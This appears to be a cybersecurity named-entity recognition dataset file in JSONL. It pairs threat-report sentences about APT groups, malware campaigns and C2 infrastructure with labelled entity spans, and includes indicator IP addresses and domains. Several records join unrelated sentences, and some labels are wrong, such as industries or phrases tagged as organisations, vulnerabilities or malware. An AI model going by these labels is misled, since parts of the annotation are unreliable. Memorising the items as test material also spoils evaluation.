{"text": "McAfee Advanced Threat Research analysts have uncovered a global data reconnaissance campaign assaulting a wide number of industries including critical infrastructure , entertainment , finance , health care , and telecommunications . Our observation of Infy 's campaigns , primarily through the lens of spearphishing attacks against Iranian civil society and media organizations , indicates a wandering focus on particular demographics on a strategic basis over time .", "spans": {"Organization: McAfee Advanced Threat Research": [[0, 31]], "Organization: critical infrastructure": [[143, 166]], "Organization: entertainment": [[169, 182]], "Organization: finance": [[185, 192]], "Organization: health care": [[195, 206]], "Organization: telecommunications": [[213, 231]], "Organization: civil society": [[341, 354]], "Organization: media organizations": [[359, 378]]}, "info": {"id": "cyberner_stix_valid_000770", "source": "cyberner_stix_valid"}}
{"text": "It searches for mobile banking applications , removes them and uploads counterfeit versions . However , to our knowledge , this is the first time Turla has used Metasploit as a first stage backdoor , instead of relying on one of its own tools such as Skipper . To copy memory , the memcpy function is invoked . The code hunted for several security products to evade – including Kaspersky .", "spans": {"Organization: security products": [[339, 356]], "Organization: Kaspersky": [[378, 387]]}, "info": {"id": "cyberner_stix_valid_000771", "source": "cyberner_stix_valid"}}
{"text": "Therefore , if we convince the attacker to request the file “ secret_info.doc ( 20KB ) ” , we can instead return to the server any file of our choice , of any size or type .", "spans": {"Indicator: secret_info.doc": [[62, 77]], "Indicator: 20KB": [[80, 84]]}, "info": {"id": "cyberner_stix_valid_000772", "source": "cyberner_stix_valid"}}
{"text": "The tool investigates the Local Security Authority Subsystem memory space in order to find , decrypt and display retrieved passwords . Zahlungsinformationen digitec.zip .", "spans": {"Malware: tool": [[4, 8]], "Indicator: Zahlungsinformationen digitec.zip": [[135, 168]]}, "info": {"id": "cyberner_stix_valid_000773", "source": "cyberner_stix_valid"}}
{"text": "109.248.148.42 /agr-enum/progress-inform/cube.php?res= .", "spans": {"Indicator: 109.248.148.42": [[0, 14]]}, "info": {"id": "cyberner_stix_valid_000774", "source": "cyberner_stix_valid"}}
{"text": "Buried among this new treasure trove , there are several mentions of previously disclosed NSA top secret programs and software such as \" STRAITBIZARRE \" , used to control implants remotely , and \" JEEPFLEA \" , a project to hack the money transferring system SWIFT . One of the IP addresses , 128.127.105.13 , was previously used by the DoNot Team (aka APT-C-35 ) , a suspected Indian APT group .", "spans": {"Organization: NSA": [[90, 93]], "Indicator: 128.127.105.13": [[292, 306]]}, "info": {"id": "cyberner_stix_valid_000775", "source": "cyberner_stix_valid"}}
{"text": "The stream of bytes is encrypted ( in some versions there is also optional compression step ) .", "spans": {}, "info": {"id": "cyberner_stix_valid_000776", "source": "cyberner_stix_valid"}}
{"text": "The Trojan stores information about C & C servers and the data harvested from the infected device in a local SQLite database . In May 2018 , Trend Micro found a new sample ( Detected as W2KM_DLOADR.UHAOEEN ) that may be related to this campaign . We concluded that Lazarus Group was responsible for WannaCry , a destructive malware .", "spans": {"Organization: Trend Micro": [[141, 152]], "Malware: W2KM_DLOADR.UHAOEEN": [[186, 205]], "Malware: WannaCry": [[299, 307]]}, "info": {"id": "cyberner_stix_valid_000777", "source": "cyberner_stix_valid"}}
{"text": "However , additional research on the C2 server 109.248.148.42 revealed a new .NET version of Zekapab that is designed for the same purpose . iDefense analysts recently came across the following malicious document that is purportedly related to the recent BREXIT negotiations between the UK and the EU .", "spans": {"Indicator: 109.248.148.42": [[47, 61]], "Malware: Zekapab": [[93, 100]], "Organization: iDefense": [[141, 149]], "Organization: EU": [[298, 300]]}, "info": {"id": "cyberner_stix_valid_000778", "source": "cyberner_stix_valid"}}
{"text": "Per their webpage , NTG “ was established primarily to cater the growing demands of Petrochemicals waste management within the Kingdom of Saudi Arabia ” . maps-modon.club : The maps-modon.club domain appears to spoof maps.modon.gov.sa , which is associated with the Saudi Industrial Property Authority , an organization “ responsible for the development of industrial cities with integrated infrastructure and services ” .", "spans": {"Indicator: maps-modon.club": [[155, 170], [177, 192]], "Indicator: maps.modon.gov.sa": [[217, 234]], "Organization: Saudi Industrial Property Authority": [[266, 301]]}, "info": {"id": "cyberner_stix_valid_000779", "source": "cyberner_stix_valid"}}
{"text": "Functionality After starting , DEFENSOR ID requests the following permissions : allow modify system settings permit drawing over other apps , and activate accessibility services . TA505 used Wizard (.wiz) files in this campaign , with FlawedAmmyy RAT as the final payload . The most common communication mode for a RAT is to act as a client to a remote server .", "spans": {"Malware: DEFENSOR ID": [[31, 42]], "Malware: RAT": [[315, 318]]}, "info": {"id": "cyberner_stix_valid_000780", "source": "cyberner_stix_valid"}}
{"text": "Most websites compromised by TG-3390 actors are affiliated with five types of organizations around the world :", "spans": {}, "info": {"id": "cyberner_stix_valid_000781", "source": "cyberner_stix_valid"}}
{"text": "Who is behind Judy ? In October 2017 , a DHS advisory documented ALLANITE technical operations combined with activity with a group Symantec calls Dragonfly ( which Dragos associates with DYMALLOY ) . The string is sent to the remote host and the response is checked to see if the first byte of the response is 0xF4, an arbitrary byte . The form also contains legitimate macro code modified by the attacker to call malicious subroutines .", "spans": {"Malware: Judy": [[14, 18]], "Organization: DHS": [[41, 44]], "Organization: Symantec": [[131, 139]], "Organization: Dragos": [[164, 170]]}, "info": {"id": "cyberner_stix_valid_000782", "source": "cyberner_stix_valid"}}
{"text": "This file duped targets into believing it was a Flash player installer that would drop a Windows batch to invoke PowerShell into the same C2 communications .", "spans": {"System: Windows": [[89, 96]]}, "info": {"id": "cyberner_stix_valid_000783", "source": "cyberner_stix_valid"}}
{"text": "The honeynet graphs , which show activity peaks associated with specific actions , also suggest that the scans were timed .", "spans": {}, "info": {"id": "cyberner_stix_valid_000784", "source": "cyberner_stix_valid"}}
{"text": "This framework enables attackers to operate in robust , horizontally segmented ecosystems , specializing in developing certain parts of the framework , and selling or leasing to others ; such frameworks are resistant to takedowns and individual component failures .", "spans": {}, "info": {"id": "cyberner_stix_valid_000785", "source": "cyberner_stix_valid"}}
{"text": "The Silence.Main Trojan , which is the main stage of the attack , has a full set of commands to control a compromised computer . Kaspersky Lab also found some watering hole attacks , including one on a website belonging to a prominent member of the Japanese government .", "spans": {"Malware: Silence.Main Trojan": [[4, 23]], "Organization: Kaspersky Lab": [[129, 142]]}, "info": {"id": "cyberner_stix_valid_000786", "source": "cyberner_stix_valid"}}
{"text": "The delivery document used in this attack was last modified by a user named ‘ Nick Daemoji ’ , which provides a linkage to previous Sofacy related delivery documents .", "spans": {}, "info": {"id": "cyberner_stix_valid_000787", "source": "cyberner_stix_valid"}}
{"text": "In their latest leak , they have released the UNITEDRAKE NSA exploit , which is a remote access and control tool that can remotely target Windows-based systems to capture desired information and transfer it to a server . While the Sima moniker could similarly originate from software labels , it is a common female Persian name and a Persian-language Word for \" visage \" or \" appearance \" . Given its use in more advanced social engineering campaigns against women 's rights activists , the label seem particularly apt .", "spans": {"Vulnerability: UNITEDRAKE NSA exploit": [[46, 68]], "Organization: social engineering campaigns": [[422, 450]], "Organization: women 's rights activists": [[459, 484]]}, "info": {"id": "cyberner_stix_valid_000788", "source": "cyberner_stix_valid"}}
{"text": "The Pitty Tiger group mostly uses spear phishing in order to gain an initial foothold within the targeted environment . To ensure persistence in the system MoneyTaker relies on PowerShell and VBS scripts - they are both difficult to detect by antivirus and easy to modify .", "spans": {"Malware: PowerShell": [[177, 187]], "Malware: VBS scripts": [[192, 203]]}, "info": {"id": "cyberner_stix_valid_000789", "source": "cyberner_stix_valid"}}
{"text": "If an attacker was able to compromise an organization's network administrator credentials , the attacker would be able to change that particular organization's DNS records at will . we detected an ongoing campaign targeting a national data center .", "spans": {}, "info": {"id": "cyberner_stix_valid_000790", "source": "cyberner_stix_valid"}}
{"text": "Visually , this can be represented as follows : Android ID When combined with our analysis of indexed directories on C2 infrastructure , we were able to easily automate the generation of the password used by each device and , in turn , successfully decompress all exfiltrated content from compromised devices . Resecurity says that IRIDIUM \" has hit more than 200 government agencies , oil and gas companies , and technology companies including Citrix . Finally , some zones used by APT1 reflect a business theme . As an example , we took the twitter login page , which implemented the following CSP rule ( which contains ): The following short JS code inserted into the site will send the credentials to google - analytics console controlled by us : The UA-#######- # parameter is the tag ID owner that Google Analytics uses to connect the data to a specific account .", "spans": {"System: Android": [[48, 55]], "Organization: Resecurity": [[311, 321]], "Organization: government agencies": [[364, 383]], "Organization: oil": [[386, 389]], "Organization: gas companies": [[394, 407]], "Organization: technology companies": [[414, 434]], "Organization: Citrix": [[445, 451]], "System: CSP": [[596, 599]], "System: Google Analytics": [[804, 820]]}, "info": {"id": "cyberner_stix_valid_000791", "source": "cyberner_stix_valid"}}
{"text": "The earliest identified sample , however , can be traced back to Jan. 18 , 2016 . NEODYMIUM also used the exact same CVE-2016-4117 exploit code that PROMETHIUM used , prior to public knowledge of the vulnerability 's existence . Threat : Gamaredon Pteranodon loader dot file . This type of vulnerability is known as a server - side request forgery ( SSRF ) .", "spans": {"Vulnerability: CVE-2016-4117": [[117, 130]], "Malware: Pteranodon": [[248, 258]], "Vulnerability: server - side request forgery ( SSRF )": [[317, 355]]}, "info": {"id": "cyberner_stix_valid_000792", "source": "cyberner_stix_valid"}}
{"text": "This is likely done to keep the developers from being prosecuted in their own countries or being extradited between countries . In September 2017 , we discovered a new targeted attack on financial institutions . Basically , two servers in the same IP range and AS14576 ( autonomous system ) share a non-standard SSH port , which is 222 . These restrictions are specified by a list of allowed URIs .", "spans": {"Organization: financial institutions": [[187, 209]], "System: a list of allowed URIs": [[374, 396]]}, "info": {"id": "cyberner_stix_valid_000793", "source": "cyberner_stix_valid"}}
{"text": "It 's probable that Patchwork uses this package to facilitate server installation when using a Windows environment . The Tibetan community has been targeted for over a decade by espionage operations that use malware to infiltrate communications and gather information .", "spans": {"Organization: Tibetan community": [[121, 138]], "Malware: malware": [[208, 215]]}, "info": {"id": "cyberner_stix_valid_000794", "source": "cyberner_stix_valid"}}
{"text": "] it server1na.exodus.connexxa [ . Custom payloads utilized by TEMP.Veles in investigations conducted by Mandiant are typically weaponized versions of legitimate open-source software , retrofitted with code used for command and control . Sending machine information and a heartbeat to the C2 : The group has since earned infamy for being involved in malicious activities associated with targeted attacks , such as deploying spear - phishing campaigns and building a backdoor .", "spans": {"Organization: Mandiant": [[105, 113]]}, "info": {"id": "cyberner_stix_valid_000795", "source": "cyberner_stix_valid"}}
{"text": "While Google did not share with us the total number of infected devices , they confirmed that one of these malicious apps collected over 350 installations through the Play Store , while other variants collected few dozens each , and that all infections were located in Italy . Clearly , OilRig incorporates a testing component within their development process , as we have previously observed OilRig performing testing activities on their delivery documents and their TwoFace webshells . The first trick is the check of the serial number of the disk . Between April 2022 and March 2023 , 39 % of the gang 's attacks hit education , compared to an average of just 4 % across all the other ransomware groups tracked by Malwarebytes .", "spans": {"System: Play Store": [[167, 177]], "Organization: education": [[620, 629]], "Organization: Malwarebytes": [[717, 729]]}, "info": {"id": "cyberner_stix_valid_000796", "source": "cyberner_stix_valid"}}
{"text": "ThreatConnect has identified a KASPERAGENT malware campaign leveraging decoy Palestinian Authority documents .", "spans": {"Organization: ThreatConnect": [[0, 13]], "Malware: KASPERAGENT": [[31, 42]], "Organization: Palestinian Authority": [[77, 98]]}, "info": {"id": "cyberner_stix_valid_000797", "source": "cyberner_stix_valid"}}
{"text": "It seems the actor wants to execute the final payload very carefully , and wants to evade detection by behavior-based detection solutions .", "spans": {}, "info": {"id": "cyberner_stix_valid_000798", "source": "cyberner_stix_valid"}}
{"text": ") are filled in and verified . So far , it appears threat actors have deployed the Bookworm Trojan primarily in attacks on targets in Thailand . Zero-days can be highly disruptive because they provide a window of time for an attacker to breach victims before the vendor is able to apply a software update to address the specific security hole . Derusbi has used unencrypted HTTP on port 443 for C2.[12 ]", "spans": {"Vulnerability: Zero-days": [[145, 154]], "Malware: Derusbi": [[345, 352]]}, "info": {"id": "cyberner_stix_valid_000799", "source": "cyberner_stix_valid"}}
{"text": "To continue my analysis , I shifted focus to Maltego so as to visually graph the infrastructure .", "spans": {}, "info": {"id": "cyberner_stix_valid_000800", "source": "cyberner_stix_valid"}}
{"text": "APT34 often uses compromised accounts to conduct spear-phishing operations . The packer is the same but the malware tries to exploit the undiscovered bug in the UPX library that causes unpack failure .", "spans": {}, "info": {"id": "cyberner_stix_valid_000801", "source": "cyberner_stix_valid"}}
{"text": "We attribute the attacks on these customers using three popular IoT devices to an activity group that Microsoft refers to as STRONTIUM .", "spans": {"Organization: Microsoft": [[102, 111]]}, "info": {"id": "cyberner_stix_valid_000802", "source": "cyberner_stix_valid"}}
{"text": "The beaconing will only start after the application is removed from the background , ultimately stopping it . The DNSMessenger malware is a shared tool , used by FIN7 , MuddyWater and perhaps other groups . If the file tmp.vbs does in fact contain similar content as that of office.vbs , then it could be another method for downloading payloads onto the target . The Malware contains some other commands to do but not all of them are implemented yet .", "spans": {"Indicator: tmp.vbs": [[219, 226]], "Indicator: office.vbs": [[275, 285]], "Malware: The Malware": [[363, 374]]}, "info": {"id": "cyberner_stix_valid_000803", "source": "cyberner_stix_valid"}}
{"text": "This is a notable behavior that is characteristic of this ransomware family . The Ke3chang group also used keyloggers and their own .NET tool to enumerate folders and dump data from Microsoft Exchange mailboxes . This serves as a decoy, an attempt to hide the content of the other ZIP . Does your organization possess any PII or regulated data such as payment card data , health care data , social security numbers or bank accounts Financially motivated attacks", "spans": {"Organization: PII": [[322, 325]]}, "info": {"id": "cyberner_stix_valid_000804", "source": "cyberner_stix_valid"}}
{"text": "The group , almost certainly compromised of a sophisticated and prolific set of developers and operators , has historically collected intelligence on defense and geopolitical issues .", "spans": {}, "info": {"id": "cyberner_stix_valid_000805", "source": "cyberner_stix_valid"}}
{"text": "Strategic threat intelligence includes an assessment of the ongoing threat posed by the threat group .", "spans": {}, "info": {"id": "cyberner_stix_valid_000806", "source": "cyberner_stix_valid"}}
{"text": "In order to collect even more information , from time to time the Zebrocy operators upload and use dumpers on victims ’ machines .", "spans": {"Malware: Zebrocy": [[66, 73]]}, "info": {"id": "cyberner_stix_valid_000807", "source": "cyberner_stix_valid"}}
{"text": "To install Chrysaor , we believe an attacker coaxed specifically targeted individuals to download the malicious software onto their device . The attachments exploited CVE-2017-8759 which was discovered and documented only five days prior to the campaign . C&C server URL . New technologies are constantly introduced within the industry , and healthcare has experienced a rapid transition to use of connected devices , which puts stress on security teams to keep up .", "spans": {"Malware: Chrysaor": [[11, 19]], "Vulnerability: CVE-2017-8759": [[167, 180]], "Vulnerability: rapid transition to use of connected devices": [[371, 415]], "Vulnerability: stress on security teams to keep up": [[429, 464]]}, "info": {"id": "cyberner_stix_valid_000808", "source": "cyberner_stix_valid"}}
{"text": "Configuration file received from the C & C server As for stealth and resilience , the attacker uses a number of tricks . Group-IB has uncovered a hacker group , MoneyTaker , attacking banks in the USA and Russia . Download a file from the Internet .", "spans": {"Organization: Group-IB": [[121, 129]], "Organization: banks": [[184, 189]]}, "info": {"id": "cyberner_stix_valid_000809", "source": "cyberner_stix_valid"}}
{"text": "A number of different C&C domains and IP addresses were identified .", "spans": {}, "info": {"id": "cyberner_stix_valid_000810", "source": "cyberner_stix_valid"}}
{"text": "Research on the malicious IP address 109.248.148.42 revealed two different .dotm components :", "spans": {"Indicator: 109.248.148.42": [[37, 51]], "Indicator: .dotm": [[75, 80]]}, "info": {"id": "cyberner_stix_valid_000811", "source": "cyberner_stix_valid"}}
{"text": "As the research progressed , it started to reveal unique characteristics which made us believe we were looking at an all-new malware campaign found in the wild . As mentioned in our previous blog on Bookworm , the Trojan sends a static date string to the C2 server that we referred to as a campaign code . Kaspersky ’s research notes that BlackOasis hacked into computers based in Saudi Arabia . Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used .", "spans": {"Organization: Kaspersky": [[306, 315]]}, "info": {"id": "cyberner_stix_valid_000812", "source": "cyberner_stix_valid"}}
{"text": "More importantly , the Command & Control server ( 176.31.112.10 ) also appears to be using an outdated version of OpenSSL and be vulnerable to Heartbleed attacks .", "spans": {"Indicator: 176.31.112.10": [[50, 63]], "Vulnerability: Heartbleed": [[143, 153]]}, "info": {"id": "cyberner_stix_valid_000813", "source": "cyberner_stix_valid"}}
{"text": "Research presented in this report shows that the PUTTER PANDA operators are likely members of the 12th Bureau , 3rd General Staff Department ( GSD ) of the People 's Liberation Army ( PLA ) , operating from the unit 's headquarters in Shanghai with MUCD 61486 . BalkanRAT enables the attacker to remotely control the compromised computer via a graphical interface , i.e. , manually; BalkanDoor enables them to remotely control the compromised computer via a command line , i.e. , possibly en masse .", "spans": {"Organization: People 's Liberation Army": [[156, 181]], "Organization: PLA": [[184, 187]], "Indicator: BalkanRAT": [[262, 271]], "Indicator: BalkanDoor": [[383, 393]]}, "info": {"id": "cyberner_stix_valid_000814", "source": "cyberner_stix_valid"}}
{"text": "Additionally , the use of what appear to be carefully crafted documents at the very least designed to look like official government correspondence suggests the malware may have been intended for a government employee or contractor who would be interested in the documents ’ subject matter .", "spans": {}, "info": {"id": "cyberner_stix_valid_000815", "source": "cyberner_stix_valid"}}
{"text": "This adversary has a wide range of implants at their disposal , which have been developed over the course of many years and include Sofacy , X-Agent , X-Tunnel , WinIDS , Foozer and DownRage droppers , and even malware for Linux , OSX , IOS , Android and Windows Phones .", "spans": {"Malware: X-Agent": [[141, 148]], "Malware: WinIDS": [[162, 168]], "Malware: Foozer": [[171, 177]], "Malware: DownRage": [[182, 190]], "System: Linux": [[223, 228]], "System: OSX": [[231, 234]], "System: IOS": [[237, 240]], "System: Android": [[243, 250]], "System: Windows": [[255, 262]]}, "info": {"id": "cyberner_stix_valid_000816", "source": "cyberner_stix_valid"}}
{"text": "Umbrella , our secure internet gateway ( SIG ) , blocks users from connecting to malicious domains , IPs , and URLs , whether users are on or off the corporate network . Talos has uncovered documents that we assess with moderate confidence are associated with suspected persistent threat actor MuddyWater . This particular MOF file creates a timer event that is triggered every five seconds . The adversary may drop or create malware , tools , or other non - native files on a target system to accomplish this , potentially leaving behind traces of malicious activities .", "spans": {"Organization: Talos": [[170, 175]]}, "info": {"id": "cyberner_stix_valid_000817", "source": "cyberner_stix_valid"}}
{"text": "Figure 19 : C & C infrastructure diagram The Infection Landscape “ Agent Smith ” droppers show a very greedy infection tactic . Clever Kitten 's goal is to eventually be able to masquerade as a legitimate user by compromising credentials either through a pass-the-hash attack , or by dumping password hashes from a compromised host . They automatically update all of Dexphot ’s components , both upon system reboot as well as every 90 or 110 minutes while the system is running . Based on our telemetry , we have identified an array of affected victims including US - based retailers , local governments , a university , and an engineering firm .", "spans": {"Malware: Agent Smith": [[67, 78]], "Malware: Dexphot": [[367, 374]], "Organization: US - based retailers": [[563, 583]], "Organization: local governments": [[586, 603]], "Organization: university": [[608, 618]], "Organization: engineering firm": [[628, 644]]}, "info": {"id": "cyberner_stix_valid_000818", "source": "cyberner_stix_valid"}}
{"text": "The DDE instructions also included another command that it did not run , which suggests it is an artifact of a prior version of this delivery document .", "spans": {}, "info": {"id": "cyberner_stix_valid_000819", "source": "cyberner_stix_valid"}}
{"text": "In case of Uri Terror Report.doc the malicious activity triggered when the document was either closed or when the show document button was clicked , when any of these event occurs a malicious obfuscated function ( chugnnarabashkoim() ) gets called .", "spans": {"Indicator: Uri Terror Report.doc": [[11, 32]]}, "info": {"id": "cyberner_stix_valid_000820", "source": "cyberner_stix_valid"}}
{"text": "This actor has shown a surprising level of amateur actions , including code overlaps , open-source project copy/paste , classes never being instanced , unstable packages and unsecured panels . All of them lie in ranges of the Jilin Province Network and Liaoning Province Network , in China . This campaign is notable for targeting East Asian governments , electronics manufacturers , and a telecommunications company . A possible solution would come from adaptive URLs , adding the ID as part of the URL or subdomain to allow admins to set CSP rules that restrict data exfiltration to other accounts .", "spans": {}, "info": {"id": "cyberner_stix_valid_000821", "source": "cyberner_stix_valid"}}
{"text": "Figure 10 . CTU researchers have observed multiple COBALT GYPSY campaigns since 2015 and consider it highly likely that the group is associated with Iranian government-directed cyber operations . Upon execution , the malware will first decrypt a string from its resources and compare it against the name of the parent process . During the course of researching the Winnti group , we came across previously unreported malware samples that we attributed to the group based on the malware arsenal and the use of registered domains as attack infrastructure .", "spans": {"Organization: CTU": [[12, 15]], "Malware: previously unreported malware samples": [[395, 432]], "Malware: malware arsenal": [[478, 493]], "System: registered domains": [[509, 527]]}, "info": {"id": "cyberner_stix_valid_000822", "source": "cyberner_stix_valid"}}
{"text": "SimBad : A Rogue Adware Campaign On Google Play March 13 , 2019 Check Point researchers from the Mobile Threat Team have discovered a new adware campaign on the Google Play Store . As previously mentioned , we assess with high confidence that APT38 's mission is focused on targeting financial institutions and financial systems to raise money for the North Korean regime . While there have been several Suckfly campaigns that infected organizations with the group 's custom malware Backdoor.Nidiran , the Indian targets show a greater amount of post-infection activity than targets in other regions .", "spans": {"Malware: SimBad": [[0, 6]], "System: Google Play": [[36, 47]], "Organization: Check Point": [[64, 75]], "System: Google Play Store": [[161, 178]], "Organization: financial institutions": [[284, 306]], "Indicator: Backdoor.Nidiran": [[483, 499]]}, "info": {"id": "cyberner_stix_valid_000823", "source": "cyberner_stix_valid"}}
{"text": "We believe the initial versions of this malware were created at least three years ago – at the end of 2014 . Most recently MuddyWater were connected to a campaign in March that targeted organizations in Turkey , Pakistan , and Tajikistan . The group 's TTPs overlap extensively with another group , Magic Hound , resulting in reporting that may not distinguish between the two groups' activities .", "spans": {}, "info": {"id": "cyberner_stix_valid_000824", "source": "cyberner_stix_valid"}}
{"text": "Red Alert 2.0 IoCs list C2 addresses 103.239.30.126:7878 146.185.241.29:7878 146.185.241.42:7878 185.126.200.3:7878 185.126.200.12:7878 185.126.200.15:7878 185.126.200.18:7878 185.165.28.15:7878 185.243.243.241:7878 185.243.243.244:7878 185.243.243.245:7878 Domains Malware source Web hosts Since at least the beginning of 2014 , APT38 operations have focused almost exclusively on developing and conducting financially motivated campaigns targeting international entities , whereas TEMP.Hermit is generally linked to operations focused on South Korea and the United States . Microcode Explorer and so on ) The most recent attack on communications company Viasat in Ukraine had a wider impact across the continent , disrupting wind farms and internet users in central Europe .", "spans": {"Malware: Red Alert 2.0": [[0, 13]], "Organization: international entities": [[450, 472]], "Organization: communications company": [[633, 655]], "Organization: Viasat": [[656, 662]]}, "info": {"id": "cyberner_stix_valid_000825", "source": "cyberner_stix_valid"}}
{"text": "The use of weaponized legitimate documents is a longstanding operational standard of this group . The first attack started in early July with a ShimRatReporter payload .", "spans": {"Indicator: ShimRatReporter": [[144, 159]]}, "info": {"id": "cyberner_stix_valid_000826", "source": "cyberner_stix_valid"}}
{"text": "If the connection to the C2 fails , it will continue to retry until it is successful . Most interestingly , Rapid7 observed the use of the Notepad++ updater gup.exe as a legitimate executable to sideload a malicious DLL (libcurl.dll) in order to deploy a variant of the UPPERCUT backdoor also known as ANEL . APT34 often uses compromised accounts to conduct spear-phishing operations .", "spans": {"Organization: Rapid7": [[108, 114]], "Malware: gup.exe": [[157, 164]], "Malware: ANEL": [[302, 306]], "Malware: compromised accounts": [[326, 346]]}, "info": {"id": "cyberner_stix_valid_000827", "source": "cyberner_stix_valid"}}
{"text": "DoublePulsar is then used to inject a secondary payload , which runs in memory only . Anomali Researchers were able to identify multiple samples of malicious RTF documents ITW using the same exploit for CVE-2018-0798 .", "spans": {"Malware: DoublePulsar": [[0, 12]], "Organization: Anomali": [[86, 93]], "Indicator: ITW": [[172, 175]], "Vulnerability: exploit": [[191, 198]], "Vulnerability: CVE-2018-0798": [[203, 216]]}, "info": {"id": "cyberner_stix_valid_000828", "source": "cyberner_stix_valid"}}
{"text": "During the app execution , the malware contacts C2 domain for further instructions . APT38 is a financially motivated group linked to North Korean cyber espionage operators , renown for attempting to steal hundreds of millions of dollars from financial institutions and their brazen use of destructive malware . this can be seen as calculating a value that will always return True . We also reveal what ransomware gangs are now experimenting with to break into your company — including their offers to “ recruit ” employees as insider threats .", "spans": {"Organization: financial institutions": [[243, 265]]}, "info": {"id": "cyberner_stix_valid_000829", "source": "cyberner_stix_valid"}}
{"text": "Again , this package source code is publicly available and can be found here . Based on our analysis of Callisto Group 's usage of RCS Galileo , we believe the Callisto Group did not utilize the leaked RCS Galileo source code , but rather used the leaked readymade installers to set up their own installation of the RCS Galileo platform . When the file is opened , it drops HIGHTIDE in the form of an executable file onto the infected system . Additional Email Delegate Permissions APT29 has used a compromised global administrator account in Azure AD to backdoor a service principal with ApplicationImpersonation rights to start collecting emails from targeted mailboxe .", "spans": {"Malware: HIGHTIDE": [[374, 382]]}, "info": {"id": "cyberner_stix_valid_000830", "source": "cyberner_stix_valid"}}
{"text": "It ’ s also possible that the apps are being used to test other possible techniques . Technical analysis on some of the attacks as well as attribution links with Pakistan actors have been already depicted by 360 and Tuisec , in which they found interesting connections to a larger group of attackers Unit 42 researchers have been tracking , which we are calling Gorgon Group . in all cases explained here , This plan should outline specific actions and procedures for attack mitigation and remediation , including guidelines for addressing extortion demands .", "spans": {"Organization: 360": [[208, 211]], "Organization: Tuisec": [[216, 222]], "Organization: Unit 42": [[300, 307]]}, "info": {"id": "cyberner_stix_valid_000831", "source": "cyberner_stix_valid"}}
{"text": "Unlike previously discovered non Google Play centric campaigns whose victims almost exclusively come from less developed countries and regions , “ Agent Smith ” successfully penetrated into noticeable number of devices in developed countries such as Saudi Arabia , UK and US . Overall , the Bookworm infrastructure overlaps with the infrastructure hosting C2 servers used by various attack tools , including FFRAT , Poison Ivy , PlugX , and others . Our close monitoring of Dexphot helped us ensure that our customers were protected from the evolving threat . Hybrid Identity APT29 has edited the Microsoft.IdentityServer.Servicehost.exe.config file to load a malicious DLL into the AD FS process , thereby enabling persistent access to any service federated with AD FS for a user with a specified User Principal Name .", "spans": {"System: Google Play": [[33, 44]], "Malware: Agent Smith": [[147, 158]], "Malware: Dexphot": [[474, 481]]}, "info": {"id": "cyberner_stix_valid_000832", "source": "cyberner_stix_valid"}}
{"text": "According to our telemetry , that was the year the distribution campaign was at its most active . This backdoor has some features similar to a previously discovered version of the Muddywater backdoor . Cobalt Group : Cobalt Gang , Cobalt Spider .", "spans": {}, "info": {"id": "cyberner_stix_valid_000833", "source": "cyberner_stix_valid"}}
{"text": "In these attacks , the delivery documents used to install Zebrocy used remote templates , which increases the difficulty to analyze the attack as an active C2 server is needed to obtain the macro-enabled document .", "spans": {"Malware: Zebrocy": [[58, 65]]}, "info": {"id": "cyberner_stix_valid_000834", "source": "cyberner_stix_valid"}}
{"text": "email as a C2 channel is not a new tactic , but it is generally not observed in the wild as often as HTTP or HTTPS .", "spans": {}, "info": {"id": "cyberner_stix_valid_000835", "source": "cyberner_stix_valid"}}
{"text": "The code is obfuscated but not packed . Black Lambert was seen only briefly and we assume it was \" retired \" from the arsenal after being discovered by FireEye in 2014 . The attackers referred to as APT12 ( also known as IXESHE , DynCalc , and DNSCALC ) recently started a new campaign targeting organizations in Japan and Taiwan . Adversaries may communicate using a protocol and port pairing that are typically not associated .", "spans": {"Organization: FireEye": [[152, 159]]}, "info": {"id": "cyberner_stix_valid_000836", "source": "cyberner_stix_valid"}}
{"text": ", including : searching for , listing , deleting , and renaming files as well as downloading a file into and retrieving a file from the device ; taking screenshots ; installing other application packages ( APK ) ; recording audio and video ; and updating the malware . It is also possible that ScarCruft deployed another zero day exploit , CVE-2016-0147 , which was patched in April . One of the domains used by the attackers in their 2018 campaign of spear phishing contained more than 130 email aliases , leading us to think that more than 130 companies had been targeted by the end of 2018 . In addition to stealing digital certificates , the Winnti gang 's campaign appears to be motivated by the desire to manipulate in - game currency , such as \" runes \" or \" gold , \" that can in many cases be converted into real currency .", "spans": {"Vulnerability: zero day exploit": [[321, 337]], "Vulnerability: CVE-2016-0147": [[340, 353]]}, "info": {"id": "cyberner_stix_valid_000837", "source": "cyberner_stix_valid"}}
{"text": "The document files exploit at least three known vulnerabilities in Microsoft Office , which we discuss in the Infection Techniques section . If the address falls within ranges that the attackers are interested in , the malicious site waits for their next page view to drop an exploit on the desirable target 's PC .", "spans": {"Malware: document files": [[4, 18]], "Vulnerability: vulnerabilities": [[48, 63]], "Vulnerability: exploit": [[276, 283]]}, "info": {"id": "cyberner_stix_valid_000838", "source": "cyberner_stix_valid"}}
{"text": "This adds an extra layer against detection . They have largely targeted organizations involved in financial , economic and trade policy , typically using publicly available RATs such as Poison Ivy , as well some non-public backdoors . As mentioned above, one of the parameters passed to the AdrGen function is the action . The attacks used a multistage infection chain initiated with malicious Microsoft Office documents , most commonly using Microsoft Excel and PowerPoint file formats .", "spans": {"Organization: financial , economic and trade policy": [[98, 135]]}, "info": {"id": "cyberner_stix_valid_000839", "source": "cyberner_stix_valid"}}
{"text": "At the same time , multinational organizations like the financial services firms targeted here must be acutely aware of the threats from state-sponsored actors working with sophisticated malware to compromise users and networks .", "spans": {}, "info": {"id": "cyberner_stix_valid_000840", "source": "cyberner_stix_valid"}}
{"text": "By 2011 , the Dukes had already developed at least 3 distinct malware toolsets , including a plethora of supporting components such as loaders and persistence modules .", "spans": {}, "info": {"id": "cyberner_stix_valid_000841", "source": "cyberner_stix_valid"}}
{"text": "Keep Google Play Protect on . In this case , the file used the software name \" Cyberlink \" , and a description of \" CLMediaLibrary Dynamic Link Library \" and listing version 4.19.9.98 . Organizations located in Myanmar and targeted by Spring Dragon have gone unmentioned .", "spans": {"System: Google Play Protect": [[5, 24]], "Malware: Cyberlink": [[79, 88]]}, "info": {"id": "cyberner_stix_valid_000842", "source": "cyberner_stix_valid"}}
